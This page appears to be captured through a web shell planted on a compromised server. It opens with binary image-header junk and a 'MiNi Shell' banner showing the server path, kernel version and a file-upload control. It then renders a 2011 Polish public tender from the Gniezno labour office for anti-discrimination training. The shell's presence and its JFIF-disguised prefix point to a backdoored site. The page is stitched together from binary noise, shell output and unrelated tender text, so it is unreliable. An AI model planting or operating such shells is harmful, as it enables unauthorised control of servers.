JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110511/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110511/109288-N-2011.html

<p class="kh_header"><b>Gniezno: Szkolenie dla pracowników Powiatowego Urzędu Pracy w Gnieźnie z zakresu dyskryminacji i nierówności występujących na rynku pracy</b><br>
<b>Numer ogłoszenia: 109288 - 2011; data zamieszczenia: 11.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Sobieskiego 20, 62-200 Gniezno, woj. wielkopolskie, tel. 061 4261649, faks 061 4261162.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup-gniezno.pl; strona BIP: www.pupgniezno.bip.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenie dla pracowników Powiatowego Urzędu Pracy w Gnieźnie z zakresu dyskryminacji i nierówności występujących na rynku pracy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest organizacja i przeprowadzenie trzydniowego szkolenia
z zakresu dyskryminacji i nierówności występujących na rynku pracy dla pracowników PUP w Gnieźnie dla dwóch grup (o tej samej tematyce) I grupa - min. 8 max. 9 osób, II grupa - min. 8 max. 9 osób, poza miastem Gniezno. Celem szkolenia jest dostarczenie wiedzy dotyczącej równości szans oraz zwalczania dyskryminacji na rynku pracy. Szkolenie współfinansowane jest ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Program Operacyjny Kapitał Ludzki, Priorytet VI, Działanie 6.1, Poddziałanie 6.1.2 Wspieranie powiatowych i wojewódzkich urzędów pracy w realizacji zadań na rzecz aktywizacji zawodowej osób bezrobotnych w regionie - projekt Kwalifikacje drogą do sukcesu. Na szkolenie skierowani zostaną kluczowi pracownicy (pośrednicy pracy, doradcy zawodowi, liderzy Klubu Pracy oraz specjaliści ds. rozwoju zawodowego) zatrudnieni 
w Powiatowym Urzędzie Pracy w Gnieźnie zgodnie z art. 91 ustawy o promocji zatrudnienia 
i instytucjach rynku pracy z dnia 20 kwietnia 2004 (Dz. U. nr 69 poz. 415 z późn. zm.).
Zakres programowy szkolenia
Program szkolenia musi opierać się o zagadnienia  m. in. w zakresie:
- pojęcie dyskryminacji na rynku pracy;
- najbardziej dyskryminowane grupy społeczne na rynku pracy;
- polityka równości szans;
- stereotypy i uprzedzenia występujące na rynku pracy;
- znaczenie płci na rynku pracy;
- działania pracowników PUP w zakresie przeciwdziałania dyskryminacji, uprzedzeniom;
- zwalczanie dyskryminacji na rynku pracy w świetle przepisów prawa;
- dobre praktyki z zakresu wyrównywania szans kobiet i mężczyzn i zwalczania dyskryminacji na rynku pracy.
Wykonawca zobowiązany będzie do opracowania i rozwinięcia programu szkolenia 
i wpisania w program szkolenia.
Szkolenie powinno być prowadzone następującymi metodami:
- praca w grupach,
- praca na forum,
- burza mózgów,
- ćwiczenia pomagające dostrzec dyskryminację wokół siebie,
- praca nad dobrymi praktykami,
- krótkie elementy wykładowe,
- studia przypadków,
oraz ewentualnie innymi technikami zaproponowanymi przez Wykonawcę w szczegółowym programie szkolenia mającymi na celu lepsze zrozumienie przez uczestników poruszanych zagadnień, w wymiarze 24 godzin zegarowych przypadających na jednego uczestnika. Sposób prowadzenia zajęć powinien być zróżnicowany.
Wykonawca w programie szkolenia zobowiązany jest opisać metody szkolenia oraz adekwatnie przypisać je do danego tematu/zagadnienia.
Wykonawca zobowiązany będzie do opracowania programu szkolenia zał. nr 1, na podstawie opisu przedmiotu zamówienia podając tematy zajęć w oparciu o zakres programowy szkolenia oraz szczegółową treść zajęć, natomiast wybrany w  niniejszym postępowaniu Wykonawca zobowiązany będzie dostarczyć w terminie wyznaczonym przez Zamawiającego harmonogram szkolenia. 
2. Warunki organizacyjne i miejsce szkolenia
2.1 Zamawiający wymaga, aby szkolenie miało charakter wyjazdowy. Wykonawca zobowiązany będzie zapewnić transport (niepublicznym środkiem transportu) wszystkim uczestnikom szkolenia pierwszego dnia szkolenia z Gniezna (z Powiatowego Urzędu Pracy
w Gnieźnie) do miejsca szkolenia oraz ostatniego dnia z miejsca szkolenia do Gniezna (do Powiatowego Urzędu Pracy w Gnieźnie). Środek transportu musi spełniać wszelkie warunki bezpieczeństwa, stan techniczny pojazdu musi być zgodny z przepisami o ruchu drogowym, posiadać sprawną klimatyzację, ogrzewanie, 
z miejscami siedzącymi na minimum 9 osób + posiadać oddzielne miejsce na ulokowanie bagaży uczestników szkolenia. Przewoźnik musi posiadać odpowiednie licencje na przewóz osób.
2.2 Wykonawca zobowiązany będzie do zapewnienia zakwaterowania i organizacji szkolenia 
w obiekcie o standardzie minimum 3 gwiazdkowym, miejsce zakwaterowania musi spełniać warunki wymagane w przepisach bezpieczeństwa i higieny pracy oraz ppoż.
Pokoje w których będą zakwaterowani uczestnicy szkolenia muszą być dwuosobowe, lub jednoosobowe zadbane, standardem odpowiadające obiektowi w którym realizowane będzie szkolenie, z oknem z możliwością jego otwarcia, wyposażone  w węzeł sanitarny (toaleta, umywalka, prysznic). Wykonawca ma obowiązek skoordynowania zakwaterowania uczestników szkolenia w obiekcie.
Wykonawca zobowiązany będzie zapewnić usługę oraz obsługę gastronomiczną podczas trwania szkolenia dla wszystkich uczestników szkolenia. 
tj. w pierwszym dniu szkolenia obiad, kolację  oraz 2 przerwy kawowe, 
w drugim dniu szkolenia śniadanie, obiad, kolację oraz  2 przerwy kawowe, 
w trzecim dniu szkolenia śniadanie, obiad oraz 2 przerwy kawowe. 
Wykonawca zapewni usługi gastronomiczne rozumiane jako:
- 2 śniadania w formie bufetu (bufet na zimno oraz dania na ciepło) wraz z napojami (kawa, herbata, soki, woda mineralna gazowana oraz niegazowana), dodatki (pieczywo, masło);
- 3 obiady - zawierające: zupę, ciepłe danie główne, surówka, deser, napoje: kawa, herbata, soki, woda mineralna gazowana i niegazowana;
- 2 kolacje (na zimno oraz dania na ciepło) - w formie bufetu, zawierającego przystawki, patery wędlin, deski serów, sałatki, itp. oraz dodatki (pieczywo, masło, sosy), ciepłe danie główne, deser, napoje: kawa, herbata, soki, woda mineralna gazowana oraz niegazowana, 
- 6 przerw kawowych podczas merytorycznej części szkolenia, składających się z: kawy, herbaty, wody mineralnej (gazowanej i niegazowanej), soków, ciastek.
Zamawiający wymaga, aby miejsce wydawania i spożywania posiłków znajdowało się w tym samym obiekcie, w którym będzie odbywało się szkolenie oraz  w którym będzie zakwaterowanie, jednak w oddzielnym pomieszczeniu, niż sala wykładowa. 

Ponadto Wykonawca zapewni salę wykładową do przeprowadzenia szkolenia w miejscu zakwaterowania, która musi spełniać następujące warunki :
- być przestronna i klimatyzowana, przystosowana do liczby osób przewidzianych do przeszkolenia;
- posiadać oświetlenie naturalne i sztuczne, 
 - posiadać miejsca siedzące dla każdego uczestnika szkolenia w układzie kinowym lub szkolnym, z miejscem umożliwiającym wykonywanie notatek przez uczestnika szkolenia;
- gwarantować naukę w warunkach wymaganych w przepisach bezpieczeństwa i higieny pracy;
- być wyposażona w pomoce dydaktyczne dostosowane do prowadzenia szkolenia będącego przedmiotem zamówienia (m.in. urządzenia audiowizualne - laptop, nagłośnienie, rzutnik multimedialny, ekran do wyświetlania prezentacji; itd.);
- posiadać zaplecze socjalne i sanitarne,  toaleta na tym samym poziomie co sala wykładowa,
- być oznaczone informacją o realizacji projektu współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.

Wykonawca zobowiązany jest do dokładnego przedstawienia miejsca zakwaterowania (opisu hotelu)  oraz opisu warunków, w jakich będzie przeprowadzone szkolenie w taki sposób, aby Zamawiający mógł ocenić zgodność oferty z zapisami w SIWZ. 
Zamawiający dopuszcza zmianę miejsca szkolenia tylko w przypadkach wynikających ze zdarzeń losowych, których na dzień składania ofert nie można było przewidzieć. Zmiana wymaga powiadomienia i akceptacji przez Zamawiającego, nowe miejsce szkolenia musi być zgodne z wymaganiami SIWZ oraz standardowo nie gorsze od miejsca szkolenia zaproponowanego w ofercie.
3. Materiały szkoleniowe
Podczas realizacji szkolenia Wykonawca zobowiązany będzie do zapewnienia uczestnikom szkolenia wszelkich niezbędnych materiałów biurowych i dydaktycznych tzn.:
- materiały biurowe: teczkę na materiały dydaktyczne, długopis, zakreślacz;
- materiały dydaktyczne w postaci: 
  * skryptu obejmującego treścią omawiane zagadnienia,
  * wydruku prezentacji multimedialnych z częścią do notatek,
  * kopii materiałów w wersji elektronicznej (na płycie CD).
Materiały szkoleniowe będą przekazywane nieodpłatnie każdemu uczestnikowi szkolenia
i muszą być adekwatne do treści szkolenia, dobre jakościowo oraz zawierające aktualne dane. Materiały wykorzystywane podczas realizacji szkolenia powinny być przekazane każdemu uczestnikowi za pokwitowaniem na początku szkolenia bądź na bieżąco zgodnie 
z realizowanym tematem zajęć. Ponadto materiały szkoleniowe muszą być opatrzone informacją o współfinansowaniu ze środków z EFS, logotypem Unii Europejskiej oraz logotypem Programu Operacyjnego Kapitał Ludzki zgodnie z Planem Komunikacji Programu Operacyjnego Kapitał Ludzki 2007 - 2013 oraz aktualnymi Wytycznymi dostępnymi na stronie internetowej www.efs.gov.pl dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki. Oryginał lub kserokopię materiałów dydaktycznych potwierdzoną za zgodność z oryginałem Wykonawca jest zobowiązany do przekazania Zamawiającemu.
4. Ubezpieczenie uczestników szkolenia od następstw nieszczęśliwych wypadków
Wykonawca zobowiązany jest do ubezpieczenia NW każdego uczestnika szkolenia na czas trwania szkolenia.
5. Liczba uczestników szkolenia
5.1. Kandydaci na szkolenie zostaną wybrani przez Zamawiającego. Wykonawca wyłoniony
w trakcie przetargu po podpisaniu umowy, a przed rozpoczęciem szkolenia otrzyma wykaz osób skierowanych przez Powiatowy Urząd Pracy w Gnieźnie zakwalifikowanych do szkolenia.	
            I grupa: min. 8 max.  9 osób
	II grupa: min. 8 max.  9 osób.
Wykonawca zobowiązany będzie do wpisania w (Formularzu ofertowym zał. nr 1 do SIWZ) tylko całkowitą (czyli obejmującą wszystkie koszty związane z realizacją szkolenia) cenę jednostkową brutto za jednego uczestnika szkolenia, która będzie nie zmienna w zależności od tego ile osób będzie uczestniczyć w szkoleniu (nie dopuszcza się wariantowości cen).
W przypadku nie podjęcia przez wskazaną osobę szkolenia Zamawiający może skierować na zwolnione miejsce inną osobę, która zobowiązana jest realizować obowiązki uczestnika szkolenia. Zamawiający jednak zastrzega sobie prawo do nie skierowania na zwolnione miejsce nowego uczestnika szkolenia wówczas Wykonawca zobowiązany będzie do wystawienia faktury na kwotę, która obejmować będzie  koszt szkolenia tylko za faktycznie przebywających uczestników szkolenia. Zamawiający określił minimalną i maksymalną liczbę uczestników szkolenia na podstawie której Wykonawca może określić wartość zamówienia.  
6. Czas trwania szkolenia
Wymagana ilość godzin zajęć wykładowych przypadających na jednego uczestnika szkolenia to 24 godziny zegarowe.  Godzina zegarowa  liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 min oraz przerwę, liczącą średnio 15 min, gdyż długość przerw może być ustalana w sposób elastyczny.
Zamawiający wymaga, aby zajęcia prowadzone były w wymiarze 8 godzin zegarowych dziennie  w godzinach między 08:00 a 17:30.
Czas uczestnictwa w szkoleniu należy ustalić na podstawie rozkładu zajęć, a więc ustalić faktyczny czas przebywania uczestnika na zajęciach w godzinach zegarowych (od godziny rozpoczęcia zajęć do godziny ich zakończenia z uwzględnieniem przerw).
7. Wymagania dotyczące zaświadczeń
Szkolenie zakończy się wydaniem uczestnikom zaświadczeń potwierdzających udział 
w odbytym szkoleniu opatrzone informacją o współfinansowaniu ze środków EFS. Na zaświadczeniu muszą znajdować się wszelkie informacje związane ze szkoleniem tzn. nazwa szkolenia, data przeprowadzonego szkolenia, imię i nazwisko osoby uczestniczącej
w szkoleniu, imię i nazwisko wykładowcy, temat szkolenia, miejsce szkolenia, nazwa firmy przeprowadzającej szkolenie itp. Ponadto na zaświadczeniach muszą zostać umieszczone obowiązujące logotypy Programu Operacyjnego Kapitał Ludzki oraz Europejskiego Funduszu Społecznego. Wykonawca zobowiązany będzie w wyznaczonym czasie przez Zamawiającego do dostarczenia w celu akceptacji przez Zamawiającego wzoru zaświadczeń jakie otrzyma każdy uczestnik szkolenia.
Wykonawca po wykonaniu usługi będzie zobowiązany do przekazania Zamawiającemu kserokopii zaświadczeń potwierdzonych za zgodność z oryginałem.
8. Wymagania dotyczące ankiet
Wykonawca zobowiązany jest do minimum dwukrotnego ankietowania uczestników szkolenia (na początku i końcu) w celu zbadania poziomu nabytych umiejętności. Ankieta powinna zawierać ocenę minimum następujących elementów: programu i metod szkoleniowych, przydatności zdobytej wiedzy przez uczestnika, zgodności materiałów szkoleniowych z programem, kompetencji trenerów, stopnia realizacji programu, organizacji szkolenia oraz słabe i mocne strony szkolenia. Wzory ankiet zostaną opracowane przez Wykonawcę i przekazane do zatwierdzenia przez Zamawiającego przed rozpoczęciem szkolenia. Ponadto wypełnione ankiety (oryginały lub ich kserokopie potwierdzone za zgodność z oryginałem) Wykonawca jest zobowiązany do przekazania Zamawiającemu.
10. Nadzór wewnętrzny szkolenia
Szkolenie powinno mieć opiekuna wskazanego przez Wykonawcę do kontaktu 
z uczestnikami szkolenia oraz Zamawiającym tj. osobę odpowiedzialną za organizację szkolenia, która musi przebywać (przez okres trwania szkolenia) w miejscu odbywania zajęć w celu zapewnienia prawidłowej organizacji zajęć i powinien dysponować telefonem komórkowym.
TERMIN WYKONANIA ZAMÓWIENIA 
Zamawiający wymaga, aby szkolenie zostało przeprowadzone w dwóch grupach:
- I grupa: 20.06.2011 do 22.06.2011
- II grupa: od 27.06.2011 do 29.06.2011.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.51.10.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 20.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przypadku posiadania wiedzy i doświadczenia Wykonawcy muszą wykazać, że w okresie ostatnich trzech lat przed  upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali należycie co najmniej jedno szkolenie zamknięte tzn. na zlecenie zewnętrznych w stosunku do siebie podmiotów oraz ilość osób uczestniczących w szkoleniu wyniosła min. 9 osób. Do wykazu należy dołączyć dokumenty potwierdzające należyte wykonanie zamówienia.
W przypadku organizacji większej ilości szkoleń spełniających określony powyżej  warunek Zamawiający przyzna dodatkowe punkty: 
o	10 i więcej szkoleń - 10 punktów; od 7 do 9 szkoleń - 8 punktów; od 4 do 6 szkoleń - 6 punktów; od 2 do 3 szkoleń - 4 punkty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Wykonawca musi zapewnić osobę, opiekuna do kontaktu z uczestnikami szkolenia oraz Zamawiającym, 
- Wykonawca musi zapewnić Wykładowcę do realizacji bloków wykładowych. Wykładowca musi mieć wykształcenie wyższe magisterskie oraz posiadać doświadczenie 
w przeprowadzeniu co najmniej 1 szkolenia w  ciągu ostatnich trzech lat przed upływem terminu składania ofert z zakresu dyskryminacji i nierówności występujących na rynku pracy dla publicznych służb zatrudnienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokument określający zasady reprezentacji oraz osoby uprawnione do reprezentacji wykonawcy, a jeżeli wykonawcę reprezentuje pełnomocnik - także pełnomocnictwo, określające zakres umocowania podpisane przez osoby uprawnione do reprezentowania wykonawcy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Dośwadczenie Wykonawcy w przprwadzeniu szkoleń - 10</li>
<li>3 - Certyfikaty zarządzania jakością kształcenia/szkolenia wydany na podstawie norm ISO, lub inny równoważny znak jakościowy - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę miejsca szkolenia tylko w przypadkach wynikających ze zdarzeń losowych, których na dzień składania ofert nie można było przewidzieć. Zmiana wymaga powiadomienia i akceptacji przez Zamawiającego, nowe miejsce szkolenia musi być zgodne z wymaganiami SIWZ oraz standardowo nie gorsze od miejsca szkolenia zaproponowanego w ofercie.
Zamawiający dopuszcza możliwość zmiany kadry dydaktycznej/opiekuna szkolenia tylko 
w przypadkach wynikających ze zdarzeń losowych, zmiana wymaga powiadomienia 
i akceptacji Zamawiającego ponadto zgłoszony wykładowca powinien legitymować się nie niższym doświadczeniem, wykształceniem niż wskazany w ofercie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pupgniezno.bip.net.pl<br>
